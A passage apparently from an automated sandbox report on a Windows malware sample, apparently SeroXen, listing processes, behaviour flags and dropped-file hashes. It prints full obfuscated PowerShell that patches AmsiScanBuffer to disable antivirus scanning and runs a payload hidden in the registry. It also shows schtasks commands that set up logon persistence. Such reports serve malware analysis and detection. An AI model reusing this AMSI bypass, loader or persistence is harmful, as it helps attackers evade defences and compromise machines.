e[]](0xb8,0x57,0,7,0x80,0xc3),0,$YvRuHxlKwiCmykVTp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RNDfNFhPZDqgrkLjC,$QZmvkgqplAIMthhHPUFidA).Invoke($YvRuHxlKwiCmykVTp,[uint32]8,0x20,[ref]$JydSHrvgHh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'TWA'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nTShvqqOlXJF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sVwAhUgJcwTTrt,[Parameter(Position=1)][Type]$OPqvajYzdD)$khRSHGkVDla=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$khRSHGkVDla.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+'e'+'c'+'ial'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+[Char](103)+''+','+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sVwAhUgJcwTTrt).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'an'+'a'+'g'+[Char](101)+''+[Char](100)+'');$khRSHGkVDla.DefineMethod('I'+'n'+''+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+','+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+'ig'+','+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$OPqvajYzdD,$sVwAhUgJcwTTrt).SetImplementationFlags('Ru'+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $khRSHGkVDla.CreateType();}$TniGVaXInvNmk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Syst'+'e'+''+'m'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+'o'+'f'+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'sa'+[Char](102)+''+[Char](101)+''+'N'+'a'+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$xlDFlvVQVbhVgl=$TniGVaXInvNmk.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yWWitRDytSCPhVRKomK=nTShvqqOlXJF @([String])([IntPtr]);$OevTuEzBXpafqZwbKoKojr=nTShvqqOlXJF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IULiqpFBicm=$TniGVaXInvNmk.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+'e'+[Char](72)+'an'+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+'2.'+'d'+''+[Char](108)+''+'l'+'')));$kasJvPQkaqTDwy=$xlDFlvVQVbhVgl.Invoke($Null,@([Object]$IULiqpFBicm,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+'r'+''+[Char](97)+'r'+[Char](121)+'A')));$dXROgPLURehdzDRSb=$xlDFlvVQVbhVgl.Invoke($Null,@([Object]$IULiqpFBicm,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$fAwRRwv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kasJvPQkaqTDwy,$yWWitRDytSCPhVRKomK).Invoke(''+'a'+'ms'+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$BVnalgrcQxzArHHJb=$xlDFlvVQVbhVgl.Invoke($Null,@([Object]$fAwRRwv,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$oaGSsPlbIp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dXROgPLURehdzDRSb,$OevTuEzBXpafqZwbKoKojr).Invoke($BVnalgrcQxzArHHJb,[uint32]8,4,[ref]$oaGSsPlbIp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BVnalgrcQxzArHHJb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dXROgPLURehdzDRSb,$OevTuEzBXpafqZwbKoKojr).Invoke($BVnalgrcQxzArHHJb,[uint32]8,0x20,[ref]$oaGSsPlbIp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+'t'+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1340
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1584
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2640
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1268
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1612 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:2480 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3460
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3888
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3980
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4408
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4632
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3584
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4164
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD516e4226eddebe2148b46353c351ec570
SHA15879aab64c4d4c086f24807f85c3f1bec657db9c
SHA25604f86ef6a2870bcaff958187d1bbf7281e6c8c1c1f2fbefddc11e3a379e4f9b9
SHA5127fa89b0aee061fca53534c7e38dfa873235095e32f64e87d7a8457e765f804d8f2408e90b90a484ea3e9c18d1110a5667de9aab14d9d9e22911433e9da4cfd38
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize664B
MD51097fe290d3def87bc547af62d71d1cf
SHA1062a6bfb8863550aaa0f6af349b56d7861879bc3
SHA2561d4b0359ef1ef5189d4eb9b6caf0c35c87298465a4b8efd35f6628479fae8140
SHA51299d4ffe9aba3b274d2da2346f5ef07754b9107b55cd415e3bfbdd8f074f5c269945a3328f67d4ebace93195c812be410f92b474b025153154b1009f46e43328e